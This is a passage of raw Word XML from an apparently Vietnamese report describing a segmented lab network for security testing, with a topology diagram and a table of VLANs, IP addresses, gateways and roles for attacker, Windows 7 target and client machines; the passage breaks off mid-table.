              <w:t>|             | VLAN 10        | | VLAN 20       | | VLAN 30          |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | 192.168.10.0/24| |192.168.20.0/24| | 192.168.30.0/24  |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             +----------------+ +---------------+ +------------------+   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                      |                 |                 |              |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                      v                 v                 v              |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             +----------------+ +---------------+ +------------------+   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | Target-Win7    | | Attacker-Kali | | Client-WinUser   |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | 192.168.10.20  | | 192.168.20.10 | | 192.168.30.50    |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | Target 4-State | | Trạm kiểm thử | | Trạm đối chứng   |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | (S0-&gt;S1-&gt;S2-&gt;S3| | Nmap/NSE/MSF  | | nghiệp vụ hợp lệ |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             +----------------+ +---------------+ +------------------+   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                                                         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F064D82" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="1FD84560" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 2.1: Sơ đồ topo mạng phân đoạn doanh nghiệp mô phỏng (Enterprise Network Topology)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA42D9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.2.4. Phân bổ không gian địa chỉ IP và thông số kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241369E8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ma trận thông số mạng, phân bổ địa chỉ IP và cấu hình giao diện mạng được chuẩn hóa tại Bảng 2.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2B26A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.1: Ma trận phân bổ địa chỉ IP, VLAN và thông số kỹ thuật các nút mạng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1436"/>
        <w:gridCol w:w="787"/>
        <w:gridCol w:w="803"/>
        <w:gridCol w:w="1956"/>
        <w:gridCol w:w="1521"/>
        <w:gridCol w:w="1369"/>
        <w:gridCol w:w="1128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="0A5ADFE6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="09134AC7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tên nút mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="44286599" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Phân vùng mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="5CCE65FD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>VLAN ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="752B78B8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Địa chỉ IP / Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="1FC31492" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="19F8E3E8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dịch vụ lắng nghe chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="7C4BFDF7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vai trò nghiên cứu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="3525EAD6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B4C3513" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Firewall/UTM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="159CEE6D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Định tuyến biên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="40737AE1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10, 20, 30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="293DD4D1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.10.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>20.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="441A2FEA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không có (Root GW)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BAD039E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lọc gói, ghi nhật ký, Inter-VLAN routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7770958B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Điểm kiểm soát chính sách và bẻ gãy tiền điều kiện </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4DE2AABB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0AAED89B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Attacker-Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="70B86302" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Pentest Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB4679" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="678B8ECF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.20.10/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6FF288F7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="467D6FE7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không mở dịch vụ inbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="553ADAA4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trạm phát sinh lưu lượng kiểm thử (Nmap, Metasploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4E584414" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0BBCAA05" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Target-Win7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5FD32C60" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Server </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="435A3F4F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="783B8AC5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.10.20/2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F4795F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>192.168.10.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="184FE118" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">TCP 445 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>microsoft-ds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>), TCP 139 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B7B2571" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Đối tượng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>kiểm thử đơn biến qua 4 trạng thái snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="5549F185" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2B389FEA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Client-WinUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="365B9605" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>User Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="729718A0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2998B806" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.30.50/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
